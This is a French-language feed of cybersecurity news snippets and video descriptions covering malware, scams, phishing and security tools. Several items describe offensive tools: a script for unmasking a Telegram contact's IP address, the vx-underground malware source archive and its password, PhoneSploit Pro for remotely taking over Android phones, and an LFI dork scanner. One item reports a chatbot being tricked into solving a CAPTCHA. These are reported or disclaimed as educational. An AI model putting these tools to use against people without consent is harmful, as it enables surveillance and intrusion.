Vous commandez souvent sur des sites de vente en ligne ? Méfiance : des pirates utilisent les pages d'erreur 404 des sites d'e-commerce pour y placer du code malveillant qui vole les données bancaires des clients. Cette attaque touche principalement les sites utilisant Magento ou WooCommerce.
Un décret discret élargit la liste des infractions sanctionnées par les radars automatiques, dont le poids du véhicule et la circulation à gauche. Le MESTA FUSION 2 est le seul radar capable de les détecter toutes.
Rien n'arrête les hackers épris de justice. Certains se sont mis en quête de traquer les activités de la police à l'aide du Bluetooth. Les équipements des services de police modernes comme les tasers sont en effet pour la plupart compatibles avec cette technologie et ainsi traçables.
Attention, Telegram ce n’est pas forcément le truc le plus étanche qui soit en matière de confidentialité. Si je vous disais, par exemple, qu’il existe un moyen simple de découvrir l’adresse IP de votre interlocuteur sur Telegram ?
Pour commencer, une petite mise en garde : ce script est destiné à des fins éducatives et ne doit pas être utilisé pour violer la vie privée des autres. Assurez-vous donc d’avoir l’autorisation de la personne concernée avant de procéder.
Je n’ai pas encore eu le temps de le tester, mais pour le faire fonctionner, vous aurez besoin d’installer le client Telegram Desktop sur votre ordinateur. Ensuite, vous aurez besoin de tshark, un outil d’analyse de réseau qui fait partie de la suite Wireshark. Tshark est disponible pour macOS, Linux et Windows, ce qui signifie que vous pouvez utiliser ce script sur presque toutes les plateformes.
Une fois que vous avez installé tshark, il est temps de mettre les mains dans le cambouis et de commencer à débusquer ces adresses IP. Le script Telegram get remote IP, qui est disponible sur GitHub, est assez simple à utiliser et nécessite que les interlocuteurs soient dans les contacts Telegram de chacun.
Pour installer le script (sous Linux), suivez les étapes ci-dessous :
Lancez ensuite Telegram Desktop, démarrez un appel avec votre correspondant et lancez le script comme ceci :
sudo python3 tg_get_ip.py
Et voilà ! Vous avez maintenant l’adresse IP de votre interlocuteur sur Telegram. N’oubliez pas que cet outil doit être utilisé de manière responsable et uniquement avec l’autorisation de la personne concernée.
Si vous vous êtes déjà demandé comment fonctionnaient les malwares, ces petits logiciel sournois qui infectent nos appareils et nous causent tant de problèmes, le mieux ce serait encore de vous plonger dans les entrailles de ces créations diaboliiiiques ;-). Petit rappel quand même, le but de cet article est de partager des connaissances et non de promouvoir des activités illégales.
C’est ce que permet ce dépôt GitHub géré par vx-underground, qui contient des tonnes de codes sources de logiciels malveillants, le tout classés par type (Android, Java, Linux, etc.). Tout est zippé et certaines archives sont protégées par le mot de passe « infected«
C’est donc dans cette base de malwares que vous trouverez des proof of concept, des botnets, des ransomwares et d’autres catégories de logiciels malveillants qui pourront vous donner un excellent aperçu de la manière dont ces bébêtes numériques fonctionnent et sont conçues.
Parmi les outils et familles de logiciels malveillants, vous découvrirez des PHP Infectors, des reverse shell, diverses backdoors, des outils de Phishing, des malwares en Python, Ruby, pour Win32, des Binders, des Botnets, des Crypters, des Exploit kits, des Ransomware, ou encore des Rootkits.
Ce trésor est le fruit des efforts de différents contributeurs et il est surtout maintenu à jour puisqu’on y trouve le dernier ransomware à la mode : HelloKitty dont les sources ont fuités ces derniers jours.
Je tiens quand même à vous rappeler que même si étudier ces codes sources peut être une excellente occasion d’apprendre comment ils fonctionnent et comment ils sont conçus, veillez à ne pas les utiliser à des fins malveillantes car vous irez en prison et ça me fera de la peine parce que j’aurai un lecteur en moins sur mon site. Ce serait con.
Pour profiter de l'offre Bitdefender à -64% c'est par ici : http://bit.ly/46fGmWP
Dans cette vidéo, plongez au cœur d'une enquête intense où j'ai traqué le cerveau derrière une arnaque dévastatrice de 300 000€. Après des jours / semaines d'investigations et une collaboration étroite avec police secours à Abidjan, j'ai réussi à infiltrer et à démystifier le brouteur responsable.
Découvrez comment nous allons maintenant mettre fin à ses activités frauduleuses et le faire répondre de ses actes devant la justice. La police prend désormais le relais pour assurer qu'il soit derrière les barreaux. Restez connectés pour les développements de cette affaire.
Remerciements :
Assan Coulibaly de : https://www.facebook.com/profile.php?id=100057269596998
Junior : Il sait pourquoi !
Xception Prod pour la miniature : https://www.behance.net/xceptionprod
Comment savoir si un fichier ou programme donné est malveillant ou pas ? Voici comment vous pouvez utiliser des environnements virtuels à la demande pour le découvrir une fois pour toutes ! ⏬ Cliquez ci-dessous pour en savoir plus ⏬.
Envie de propulser tes compétences et ta (future) carrière en Cybersécurité/Informatique ?... alors, 👍 POUCE BLEU, ABONNE TOI ET METS LA CLOCHE 🛎️ ► https://www.youtube.com/c/MichelKartner?sub_confirmation=1
Nous voyons dans cette vidéos différentes solutions pour savoir si un fichier est un virus. De la simple analyse visuelle et recherche jusqu'à l'exécution dans un machine virtuelle accessible à travers notre navigateur. Cela nous permet de découvrir les connexions réseaux que font les programmes, les fichiers qu'ils créent (et leur contenu), les liens avec d'autres processus, etc... Bref, le paradis pour les analystes de malwares... et pour les particuliers qui veulent s'assurer qu'un programme est sain AVANT de cliquer...
🗨️ On se retrouve dans les COMMENTAIRES pour toutes remarques/questions !
👉 Playlist Hacking éthique - Progresser en cybersécurité, amorcer une carrière ou apprendre par simple intérêt : https://www.youtube.com/playlist?list=PLWf3reNXRVnNCr9nu57LR0PQtm13yGWKq
👉 Playlist Anonymat et Données personnelles - Faire les bons choix, révélations et mythes : https://www.youtube.com/playlist?list=PLWf3reNXRVnOeMYIY5zRK_W5Wfx3MxcVj
👨💻 Michel KARTNER est formateur en cybersécurité à l'origine des site Le Blog Du Hacker et Cyberini. Consultant en sécurité informatique junior reconverti en entrepreneur, il cherche à partager ses connaissances dans le but d'aider le plus grand nombre à se protéger contre les cybermenaces et à progresser dans le domaine.
Les caméras de vidéosurveillance équipées de micros sont illégales estime la CNIL, dans un avis rendu concernant un dispositif de sécurité expérimenté à Orléans. Le gardien des libertés en ligne affirme qu'elles relèvent du traitement de données à caractère personnel.
Il est possible de faire réaliser des tâches interdites à Bing Chat. Un utilisateur est parvenu à ses fins en racontant une histoire larmoyante au chatbot pour le pousser à déchiffrer un CAPTCHA, une action qu'il n'est pas censé faire normalement.
Bing Chat est un outil très pratique pour générer du texte mais aussi pour faire des recherches. Connecté à Internet, le chatbot a notamment la capacité de vous orienter vers des liens en fonction de vos requêtes. Problème, certains sont totalement malveillants.
Dans un monde où digitalisation rime avec opportunité, la suite Microsoft 365 surgit comme l’alliée incontournable de milliers d’entreprises en quête d’une synergie accrue et d’une sécurité renforcée. Loin d’être un havre impénétrable, ce condensé technologique est cependant devenu la cible des hackers. Mais pourquoi cet outil est-il devenu le théâtre d’une telle convoitise de la... Lire la suite
Un nouveau malware circule actuellement sur Windows : Exela Stealer. Ce redoutable logiciel malveillant disponible en open-source étonne par sa méthode brute, qui emploie Discord pour communiquer aux pirates les informations volées aux victimes.
Les grandes célébrations sportives telles que la Coupe du Monde de Rugby et les Jeux olympiques 2024 à Paris constituent une fenêtre propice aux risques de cyberattaques. Il s’avère alors essentiel de porter une attention particulière à la cybersécurité. Dans cette optique, nous explorons ici les principales menaces qui pèsent sur ces évènements et les solutions... Lire la suite
Une redoutable campagne de phishing sévit actuellement, répandant une variante du malware bancaire BBTok sur les ordinateurs. Outre les fonctionnalités habituelles, cette version se démarque par de fausses interfaces bancaires extrêmement fidèles.
Les nouvelles réglementations européennes vont améliorer notre sécurité en ligne, sauf sur un point.
---
Send in a voice message: https://podcasters.spotify.com/pod/show/fraudeur-hacker-et-vous/message
Ça vous dirait de comparer les différentes versions des binaires (.exe, .dll…etc) système de Windows pour essayer de déterminer les changements et les mises à jour apportés au fil du temps ? Vous pourriez avoir besoin de ces informations pour des raisons de sécurité, pour debugger un logiciel qui aurait des petites incompatibilité avec une version différente de Windows, ou simplement par curiosité. Quoi qu’il en soit, WinDiff est là pour vous faciliter la tâche.
WinDiff est un outil web open-source qui permet de parcourir et comparer les informations sur les symboles et les types des binaires présents sous Windows y compris en fonction des différentes versions existantes de l’OS. Composé d’un outil CLI (en ligne de commande) basé sur Rust et d’une interface web frontend en TypeScript, WinDiff utilise Winbindex pour trouver et télécharger les PEs et PDBs requis. Il se met à jour automatiquement avec les dernières mises à jour Windows et offre une interface conviviale pour visualiser les données. Vous pouvez d’ailleurs la tester ici.
Pour utiliser WinDiff, commencez par installer Rust 1.68+ et Node.js 16.8+ sur votre machine si vous ne l’avez pas déjà fait. Ensuite, suivez ces étapes :
Clonez le dépôt GitHub : git clone https://github.com/ergrelet/windiff.git
Accédez au répertoire cloné : cd windiff
Exécutez le script de construction frontend : ci/build_frontend.sh
Personnalisez le fichier de configuration si nécessaire (ci/db_configuration.json).
Les PRs (Pull Requests) pour ajouter de nouveaux binaires à la version live sont également les bienvenues pour les plus motivés d’entre vous.
Une fois que vous avez suivi ces étapes, vous pourrez lancer WinDiff et commencer à explorer les binaires de Microsoft Windows.
L’interface utilisateur de WinDiff est simple et facile à utiliser, même pour les débutants. Vous pouvez sélectionner les versions de Windows que vous souhaitez comparer, puis parcourir les informations sur les symboles et les types des binaires. Les données sont présentées de manière claire et organisée, facilitant la compréhension des différences entre les versions.
En résumé, WinDiff est un outil précieux pour quiconque souhaite comparer et analyser les binaires Microsoft Windows en fonction des versions du système d’exploitation. Que vous soyez un professionnel de la sécurité, un développeur ou simplement curieux, WinDiff peut vous aider à mieux comprendre l’évolution de Windows au fil du temps.
Méfiance lorsque vous tentez d'accéder à la page de téléchargement d'un logiciel via Google Ads. Des pirates peuvent y cacher de dangereux malwares. Ces jours-ci, c'est l'application de visioconférence WebEx qui sert de couverture aux malfrats.
Sur votre smartphone Android, Google Play Protect s'efforce de détecter les malwares. Le programme sera bientôt renforcé par une nouvelle fonctionnalité bien utile pour les utilisateurs qui sortent des sentiers battus du Play Store.
Des chercheurs ont découvert WiKI-Eve, une nouvelle attaque WiFi qui intercepte les BFI, des données en clair qui révèlent les frappes sur l'écran du smartphone. Ils ont pu deviner les mots de passe numériques avec une grande précision.
Vous le savez, les menaces en ligne sont partout, et pouvoir les analyser rapidement peut faire toute la différence. C’est pourquoi Qu1cksc0pe est l’arme idéale pour ce job.
Cet outil d’analyse de logiciels malveillants tout-en-un est capable d’analyser les binaires Windows, Linux, OSX ainsi que les documents, les fichiers APK et les archives. Cela permet à Qu1cksc0pe de dévoiler des informations contenues dans les binaires telles que les fichiers DLL utilisés, les fonctions et API, les sections et segments, sans oublier bien sûr tout ce qui a trait aux URLS, adresses IP et e-mails.
Cet outil vous fera sentir comme un véritable hacker dans son propre film d’action ^^.
Sachez également que Qu1cksc0pe fonctionnera sous Windows Subsystem Linux (WSL).
Étape 1 : Comment installer Qu1cksc0pe
Le vrai bonheur commence maintenant. Pour installer Qu1cksc0pe sur votre système, voici les commandes à exécuter:
Vous pouvez également effectuer des analyses avec VirusTotal, scanner les dossiers et même analyser des documents et des archives et pour cela, je vous invite à lire la doc !
Et en bonus…
Pour les vrais passionnés de terminal, Qu1cksc0pe peut également être lancé en mode interactif comme ceci :
python3 qu1cksc0pe.py --console
Bref pour conclure, je dirais que Qu1cksc0pe est un outil puissant pour toute personne intéressée par l’analyse de logiciels malveillants. Avec bonne variété de fonctionnalités, il permet aux utilisateurs d’avoir une vision complète et détaillée des fichiers suspects. Alors que vous soyez professionnel de la sécurité ou simplement quelqu’un qui aime bidouiller et explorer, Qu1cksc0pe est un choix intéressant.
Si vous êtes expert en sécurité, PhoneSploit Pro est un outil tout-en-un écrit en Python qui va vous intéresser. Spécialement conçu pour exploiter à distance les appareils Android en utilisant ADB (Android Debug Bridge) et Metasploit-Framework, ce projet vise à faciliter la réalisation de tests de pénétration sur les appareils Android.
Évidemment, PhoneSploit Pro peut également être utilisé comme une trousse à outils ADB pour effectuer diverses opérations sur les appareils Android que ce soit via le Wi-Fi ou un simple câble USB.
Parmi les nombreuses fonctionnalités de PhoneSploit Pro, il y a la connexion à distance à l’appareil en utilisant ADB, l’accès au shell de l’appareil connecté, l’arrêt du serveur ADB, etc… L’outil permet également de faire des captures d’écran et de les récupérer automatiquement sur votre ordinateur, ou encore d’enregistrer ce qui se passe à l’écran pendant une certaine durée.
Vous pourrez également télécharger et envoyer de fichiers, lancer une application et avoir accès aux moindres recoins du smartphone.
Voici quelques-unes des fonctionnalités de PhoneSploit Pro :
Copier toutes les photos de la caméra sur l’ordinateur.
Envoyer des SMS via le périphérique cible.
Déverrouiller et verrouiller le périphérique avec une facilité déconcertante.
Extraire tous les SMS, contacts et journaux d’appels du périphérique vers l’ordinateur.
Obtenir des informations sur le périphérique et la batterie.
Et obtenir une image de tout ce qui se passe à l’écran ou contrôler le périphérique cible.
Pour profiter de toutes ces fonctionnalités, il vous suffit de vous assurer que tous les logiciels requis sont installés, puis de suivre le tutoriel pour configurer votre téléphone Android. Une fois la configuration terminée, vous pourrez connecter votre téléphone Android à votre ordinateur via Wi-Fi en utilisant adb. Sur Linux ou macOS, ouvrez le terminal et collez les commandes suivantes pour installer PhoneSploit Pro :
Puis téléchargez la dernière version de platform-tools et copiez tous les fichiers extraits de platform-tools ou du répertoire adbdirectory dans le répertoire PhoneSploit-Pro, et enfin exécutez
python phonesploitpro.py.
PhoneSploit Pro est compatible avec plusieurs systèmes d’exploitation, mais je vous recommande d’utiliser Linux pour profiter pleinement de ses fonctionnalités.
Évidemment, ce projet est uniquement destiné à des fins éducatives ou dans le cadre d’une mission de cybersécurité réalisée par un professionnel. L’utilisation de cet outil sur le téléphone de quelqu’un sans sa permission est totalement interdite et vous finirez en prison si vous ne respectez pas la loi (sauf si à un moment vous avez eu une responsabilité politique importante. Dans ce cas, vous n’aurez qu’un bracelet électronique et vous pourrez continuer à mener une vie normale).
Si, pour chiffrer un message, on applique toujours exactement le même chiffrement, des vulnérabilités apparaissent.
Flickr/DataCorp Technology LTD, CC BY-NC
Un spectre hante le petit monde des économistes : les pseudonymes utilisés de 2013 à 2023 pour envoyer des messages sur le forum Economics Job Market Rumors (EJMR), dont le site prétendait qu’ils étaient totalement sûrs et garantissaient de pas de remonter aux auteurs et autrices des messages, permettent en réalité d’identifier de quelle adresse Internet ces messages ont été postés. Un récent article (Anonymity and identity online, par les chercheurs Florian Ederer, Paul Goldsmith-Pinkham et Kyle Jensen) donne le procédé suivi pour cela. Cet article met en lumière de graves erreurs d’utilisation de la cryptographie par le gestionnaire du site.
Pour comprendre ce qui s’est passé, considérons tout d’abord le chiffrement le plus simple, par substitution de lettres : on remplace chaque lettre de l’alphabet par une autre, ou par un symbole, et la clef secrète est la table de ces substitutions. Quiconque a lu Sherlock Holmes (Les Hommes Dansants) sait que l’on peut attaquer un tel chiffrement en repérant que le E est la lettre la plus fréquente, puis en faisant des inférences par rapport aux mots rencontrés.
De fait, si pour chiffrer un message on applique toujours exactement le même chiffrement, on a une vulnérabilité : si on utilise toujours le même message chiffré pour le texte en clair OUI et toujours le même message chiffré pour le texte en clair NON, une personne espionnant la conversation a vite fait d’identifier ces réponses. Aussi, quand on chiffre un message, on va habituellement le faire précéder de données tirées au hasard, de sorte que le message chiffré dépendra de ces données et qu’on obtiendra deux messages chiffrés différents en chiffrant OUI deux fois ; on jettera ces données au moment du déchiffrement.
Hachage cryptographique
Dans le procédé qui était utilisé par le site EJMR, l’adresse IP de l’utilisateur (une adresse formée de nombres qui lui est attribuée par son fournisseur d’accès Internet) était combinée avec le sujet de discussion dans lequel il intervenait, puis passée à une fonction de hachage cryptographique (pas un chiffrement, mais la différence entre les deux n’est pas importante pour la vulnérabilité du procédé), sans ajout de donnée supplémentaire. Cette combinaison se faisait tout simplement en les mettant bout à bout, ce que les auteurs de l’article ont vite trouvé. Ensuite, le pseudonyme de l’utilisateur dans le fil de discussion était formé de quatre chiffres extraits de la sortie de cette fonction de hachage.
Avec un tel procédé, il est facile de tester si un message a pu être posté depuis une certaine adresse : il suffit de prendre cette adresse, de la mettre bout à bout avec le sujet de discussion, de passer le tout au hachage cryptographique, d’extraire les quatre chiffres pertinents et de comparer le résultat avec le pseudonyme identifiant la personne dans ce fil. Les auteurs de l’article ont fait cela pour toutes les adresses possibles (il y en a environ 4 milliards) et tous les fils de discussion. Pour chaque message, pour chaque fil, ils ont ainsi identifié les possibles adresses d’où il aurait pu être posté. Ceci donne, pour chaque message, environ 65 000 adresses d’origine possibles.
On pourrait penser qu’avoir une liste de 65 000 adresses possibles, ce n’est pas pointer les auteurs. Mais, de même que pour l’énigme des hommes dansants, Sherlock Holmes pouvait exploiter le fait que la même convention de chiffrement était utilisée pour plusieurs lettres et que celles-ci devaient former des mots, ici on peut exploiter le fait que le même utilisateur, à la même adresse, risque de poster des messages sur plusieurs sujets. Or, seule une infime proportion des utilisateurs d’Internet poste sur EJMR. Si une même adresse apparaît parmi les adresses possibles pour des utilisateurs postant à des dates voisines sur plusieurs sujets de ce site, alors c’est probablement elle l’adresse de ces utilisateurs.
[Plus de 85 000 lecteurs font confiance aux newsletters de The Conversation pour mieux comprendre les grands enjeux du monde. Abonnez-vous aujourd’hui]
L’article se livre ensuite à diverses analyses : certaines adresses utilisées appartiennent aux réseaux de prestigieuses universités ou institutions étatsuniennes ; une proportion des messages postés avaient un caractère raciste et/ou sexiste ; etc. C’est ce dernier point qui, peut-être, fait réagir certains qui n’aimeraient pas que leurs propos orduriers soient rapportés à leur employeur ou soient publiquement associés à leur personne.
Procédé absurde
Du point de vue de l’informaticien et notamment du cryptographe, le procédé utilisé pour anonymiser, ou plutôt pseudonymiser, les utilisateurs de ce site, était absurde. Dès que l’article explique comment le site fonctionnait, la messe est dite : l’attaque est évidente. Comment se fait-il que ce mécanisme de pseudonymisation ait été choisi ?
Au vu de certains messages laissés par l’auteur du site, celui-ci avait une très grande confiance dans l’impossibilité de remonter aux adresses des auteurs des messages, probablement fondée sur le choix d’une fonction de hachage cryptographique. Ces fonctions, en effet, sont censées être à sens unique : on ne peut pas remonter aux données originales. Cependant, cela ne vaut que si on utilise convenablement ces fonctions, et ici il aurait fallu, par exemple, ajouter aux données une donnée secrète, connue uniquement du gestionnaire du site.
La morale de cette affaire est que si, de nos jours, des outils cryptographiques sont largement disponibles depuis des langages de programmation destinés à un large public, ces outils sont difficiles à utiliser. On dit souvent don’t roll your own security – « ne déployez pas des mécanismes de sécurité de votre propre conception », et ce notamment s’agissant d’individus ou d’entreprises dont la sécurité ou la cryptographie n’est pas le sujet d’expertise.
Dans certains cas, on peut se féliciter de l’incompétence des auteurs. Ainsi, une étude a relevé en 2016 que de nombreux logiciels malware, c’est-à-dire utilisés à des fins malveillantes, de piratage, d’exigence de rançons, etc. comportent des erreurs d’utilisation de la cryptographie. Les auteurs attribuent cela à ce que les auteurs de malware utilisent la cryptographie sur la base d’intuitions, de superstition, et sautent sur les occasions de réinventer la roue (proposer leur propre solution à des problèmes déjà bien connus et traités et pour lesquels il existe des solutions très convenables), mais aussi d’utiliser des éléments logiciels préexistants mais qui résolvent d’autres problèmes que celui posé. Par ailleurs, ils bluffent afin de décourager les victimes.
Le précédent OpenSSL
Hélas, les dysfonctionnements cryptographiques dus à de la rédaction ou modification hasardeuse de logiciels ne sont pas limités aux logiciels malveillants. Un exemple célèbre est la découverte en 2008 que, depuis 2006, le générateur de clefs cryptographiques de la bibliothèque OpenSSL distribuée dans le système d’exploitation Debian Linux (et d’autres basés sur lui, comme Ubuntu), au lieu de tirer les clefs au hasard dans un énorme espace, les tirait en fait de sorte qu’il suffisait de les essayer toutes pour pouvoir faire des choses normalement interdites (intercepter des communications avec des sites web sécurisés, etc.).
Ce fiasco était dû à des modifications du logiciel par des gens qui ne comprenaient pas son fonctionnement et à des problèmes de communication avec l’équipe chargée du développement du logiciel.
Pour en revenir au forum EJMR, cet épisode devrait nous inciter à avoir un regard critique sur les prétentions à la sécurité (« cryptographie de qualité militaire », « inviolable », etc.) de prestataires, de sites, de fournisseurs, qui ne reposent pas sur des études publiques et documentées.
David Monniaux does not work for, consult, own shares in or receive funding from any company or organisation that would benefit from this article, and has disclosed no relevant affiliations beyond their academic appointment.
Dans le monde interconnecté d’aujourd’hui, la demande en matière de mesures de sécurité robustes et de connectivité fluide pour les entreprises atteint des niveaux sans précédent. Cette demande a donné naissance à un concept de sécurité transformateur connu sous le nom de SASE ou Secure Access Service Edge. Ce dernier représente un changement de paradigme... Lire la suite
Il existe de nombreux virus différents, mais ceux qui ont le plus d'impact sur notre vie privée sont ceux qui nous font perdre des données personnelles, comme les photos de nos moments préférés, et ceux qui bloquent notre machine en cryptant tous nos fichiers contre une rançon, souvent en crypto-monnaies.
---
Send in a voice message: https://podcasters.spotify.com/pod/show/fraudeur-hacker-et-vous/message
Utilisateurs d'Android, soyez extrêmement méfiants : le dangereux spyware BadBazaar est actuellement diffusé sur les canaux officiels, le Google Play Store et le Samsung Galaxy Store, en se faisant passer pour Telegram et Signal. Il collecte toutes vos informations.
LFI Space Tool est un outil « tout-en-un » conçu pour détecter les vulnérabilités d’inclusion de fichiers locaux (LFI) dans les applications web notamment grâce à des dorks LFI.
L’outil permet de faciliter l’identification des failles de sécurité potentielles grâce à deux méthodes de repérage : la recherche de dorks Google et le ciblage d’URL via une liste que vous fournissez.
Voici quelques uns de ces dorks (vous pouvez évidemment rajouter les votre) :
Que vous soyez un professionnels de la sécurité informatique, un pentester, un hacker éthique ou un développeur voulant évaluer rapidement la sécurité de son application web, LFI Space Tool peut être une bonne entrée en la matière même si évidemment, ça ne fait pas tout.
Voici une démo du fonctionnement de LFI Space :
Pour l’installer, ouvrez un terminal et entrez les commandes suivantes :
LFI Space Tool est un atout précieux pour tous ceux qui souhaitent améliorer la sécurité leurs applications web même si une fois encore, ce n’est pas un outil miracle qui viendra remplacer votre bon vieux cerveau, donc ne vous contentez pas uniquement de ça.
Je suis tombé un peu par hasard sur une nouvelle fonctionnalité de Google One en lisant les annonces de Google. Il s'agit d'un service vérification des fuites de vos données personnelles sur le Dark Web, un peu à la manière de la plateforme Have I been Pwnd que je vous avais présenté il y a quelques années.
Ce service est capable d'analyser la présence de l'ensemble des vos données personnelles : nom, prénom, adresse, téléphone, email sur les dumps de vol données disponibles sur le Dark Web.
La fonctionnalité s'active en quelques secondes et donne des résultats très pertinents immédiatement :
Nom du site où les données ont fuité
Informations qui ont fuité
Début du mot de passe qui a fuité
... etc
Voici un exemple de rapport produit par la plateforme Google One :
Bref, si vous avez une licence Google One, je vous invite très fortement à activer ce service tout comme le service de VPN disponible dans l'offre Google One.
En complément de ce service, je vous invite aussi à utiliser un service de protection de vos mots de passe gratuit comme KeepassXC et d'utiliser un mot de passe unique sur chaque service en ligne que vous utilisez. Dès lors que cela est possible, n'hésitez pas à activer le mécanisme de double authentification pour réduire les risques de piratage en cas de fuite de mot de passe.
À la conférence DEF CON cette année, de nombreux participants ont vu leur iPhone leur demander de donner un mot de passe pour se connecter à une Apple TV inexistante. L’œuvre d'un chercheur en cybersécurité qui s'est bien amusé à troller tous les utilisateurs.
Pour profiter de l'offre CyberGhost VPN de 83% de réduction et 4 mois gratuit, cliquez ici : https://www.cyberghostvpn.com/Sandoz
Aujourdhui je vais vous parler des arnaques qui tournent en ce moment comme l'arnaque du "Faux Tueur à Gages". Vous serez choqués par les méthodes manipulatrices utilisées par ces escrocs pour semer la terreur et extorquer de l'argent à leurs victimes.
Ensuite, nous plongerons dans le monde des arnaques liées aux comptes Instagram. Découvrez comment des imposteurs se font passer pour des des proches à vous pour attirer votre attention afin de pirater votre compte. Et on parlera aussi des arnaques dans le monde artistique - Arnaques aux Illustrateurs et Dessinateurs.
Pour dénoncer votre brouteur c'est ici : https://monbrouteur.com
Contact pro : sandoz.pro@gmail.com
Remerciement :
@Arnaquemoisitupeux pour la voix off : https://www.twitch.tv/arnaquemoisitupeux
@Lalain Pour le dev de Monbrouteur.com
Xception Prod pour la minia : https://www.behance.net/xceptionprod
Depuis plusieurs semaines, nombre d'utilisateurs de LinkedIn sont ciblés par des pirates. Certaines victimes ont totalement perdu l'accès à leur compte tandis que d'autres ont dû payer une rançon pour le récupérer. La vigilance est donc de mise !
Wholeaked est l’outil parfait pour tous ceux qui veulent partager des fichiers en gardant l’esprit en paix. Wholeaked, codé en Go, est un moyen ingénieux de détecter qui est responsable d’une fuite de données.
Imaginez un instant que vous ayez besoin d’envoyer un document important et confidentiel à quelqu’un. Comment être sûr que ce « quelqu’un » ne vous trahisse pas en diffusant ensuite ce document publiquement ?
C’est là que Wholeaked entre en jeu. Il prend le fichier que vous voulez partager et une liste de destinataires et ajoute une signature unique à chaque fichier secrètement (watermark). Ensuite, il peut envoyer automatiquement les fichiers aux destinataires correspondants en utilisant des intégrations Sendgrid, AWS SES ou SMTP. Au lieu de les envoyer par e-mail, vous pouvez également les partager manuellement. Wholeaked fonctionne avec tous les types de fichiers, mais il dispose de fonctionnalités supplémentaires pour les types de fichiers courants type PDF, DOCX, XLSX, PPTX, MOV, JPG, PNG, GIF, EPS, AI et PSD.
Dans un monde idéal, Wholeaked serait votre poucave préférée dans la lutte contre les fuites de données. Pour identifier qui est responsable d’une fuite, il suffit de fournir le fichier divulgué à Wholeaked, et il révèlera la personne responsable en comparant les signatures dans la base de données. C’est comme les empreintes digitales laissées sur une scène de crime, mais dans le monde numérique !
Wholeaked utilise 3 types de signatures : binaire, métadonnées et filigrane. La signature binaire est directement ajoutée au binaire, la signature de métadonnées est ajoutée à une section de métadonnées d’un fichier, et le filigrane invisible est insérée dans le texte.
Pour installer Wholeaked, vous pouvez télécharger les binaires à partir de la page des releases GitHub et les exécuter. Ou, si vous préférez, vous pouvez également installer Go sur votre système et exécuter la commande
go install github.com/utkusen/wholeaked@latest
N’oubliez pas non plus d’installer exiftool pour ajouter des signatures aux métadonnées des fichiers et également pdftotext pour vérifier les filigranes dans les fichiers PDF. Les instructions d’installation sont dispo pour Debian, macOS et Windows.
A vous de jouer maintenant pour protéger vos données et lutter contre les petites fuites.
Frauder dans les transports ? Trop risqué. Quatre adolescents ont préféré pirater le métro de leur ville pour obtenir des trajets gratuits à l'infini. Ceux-ci on partagé leurs travaux lors de la conférence de hack Defcon et c'est pour le moins impressionnant.
Comment se déroule un pentest informatique ? Qui peut faire un test d'intrusion et comment ? ⏬ Cliquez ci-dessous pour en savoir plus ⏬.
Envie de propulser tes compétences et ta (future) carrière en Cybersécurité/Informatique ?... alors, 👍 POUCE BLEU, ABONNE TOI ET METS LA CLOCHE 🛎️ ► https://www.youtube.com/c/MichelKartner?sub_confirmation=1
▂▂▂▂▂▂ LIENS UTILES ▂▂▂▂▂▂
✅ Plus d'informations sur le Threat Modeling ► https://owasp.org/www-community/Threat_Modeling
✅ Mozilla SeaSponge ► https://mozilla.github.io/seasponge/#/
✅ Plus d'informations sur la Cyber Kill Chain ► https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html
👨🎓 Psst! nous voyons le déroulement en pratique d'un pentest avec un exemple complet de rapport et de contrat dans la Formation Cybersécurité sur Cyberini ► https://cyberini.com/formation-cybersecurite/
▂▂▂▂▂▂ DESCRIPTION ▂▂▂▂▂▂
Un test d'intrusion ou pentest permet de vérifier la sécurité d'un système d'information à un instant T. Cela est particulièrement utile pour vérifier la sécurité d'un nouveau site web, système ou service de manière générale. Mais une entreprise peut à tout moment demander un tel pentest pour obtenir un véritable aperçu des piratages qu'elles risque potentiellement. Car une fois le test d'intrusion terminé, le pentesteur pourra apporter des éléments de correction et sécuriser pour de bon le SI du client.
🗨️ On se retrouve dans les COMMENTAIRES pour toutes remarques/questions !
👉 Playlist Hacking éthique - Progresser en cybersécurité, amorcer une carrière ou apprendre par simple intérêt : https://www.youtube.com/playlist?list=PLWf3reNXRVnNCr9nu57LR0PQtm13yGWKq
👉 Playlist Programmation - Apprendre à programmer, quels outils utiliser et bonnes pratiques : https://www.youtube.com/playlist?list=PLWf3reNXRVnPCFLN5dJ-eTQX3EA1-P4GQ
👉 Playlist Anonymat et Données personnelles - Faire les bons choix, révélations et mythes : https://www.youtube.com/playlist?list=PLWf3reNXRVnOeMYIY5zRK_W5Wfx3MxcVj
👨💻 Michel KARTNER est formateur en cybersécurité à l'origine des site Le Blog Du Hacker et Cyberini. Consultant en sécurité informatique junior reconverti en entrepreneur, il cherche à partager ses connaissances dans le but d'aider le plus grand nombre à se protéger contre les cybermenaces et à progresser dans le domaine.
La fraude en ligne ce n’est pas seulement le phishing. C’est aussi les escroqueries dans lesquelles les fraudeurs vous font croire à une réalité fictive afin de vous convaincre de leur transférer de l’argent … volontairement.
Leurs techniques sont de plus en plus efficaces mais avec un peut d’attention, on peut les voir venir et s’arrêter avant que ce soit trop tard.
---
Send in a voice message: https://podcasters.spotify.com/pod/show/fraudeur-hacker-et-vous/message
Canon met en garde tous ses clients que de nombreux modèles de ses imprimantes comportent une faille de sécurité majeure. Au moment de l'initialisation des appareils, ces derniers ne suppriment pas les anciennes données Wi-Fi comme ils devraient le faire.
Ces jours-ci, des pirates tentent de piéger les internautes en se faisant passer pour la SNCF. Via des mails frauduleux, ils promettent une réduction indécente sur la carte Avantage. Il s'agit d'une opération de phishing dont le but est d'intercepter vos identifiants bancaires.
Près d'une trentaine d'applications Android sont à désinstaller sans plus tarder. Et pour cause, elles abritent des malwares insidieux qui menacent notamment les cryptomonnaies stockées sur vos portefeuilles numériques.
Pour en savoir plus sur la cybersécurité et rejoindre l'équipe Thales, cliquez ici : https://bit.ly/Thalesgroupcareer
🔐 Plongez dans l'univers fascinant de la cybersécurité ! Dans cette vidéo, je vous emmène avec moi à l'événement incontournable de la communauté de la cybersécurité : Le Hack (anciennement connu sous le nom de "La Nuit du Hack"). 🕵️♂️
🌟 Lors de cette soirée, j'ai eu la chance de rencontrer des passionnés de la cybersécurité venus du monde entier pour partager leur savoir, leurs compétences et leur passion pour ce domaine en constante évolution. De l'ambiance survoltée des conférences aux défis ludiques des ateliers, j'ai vécu une expérience incroyable au cœur de la sécurité numérique. 💻
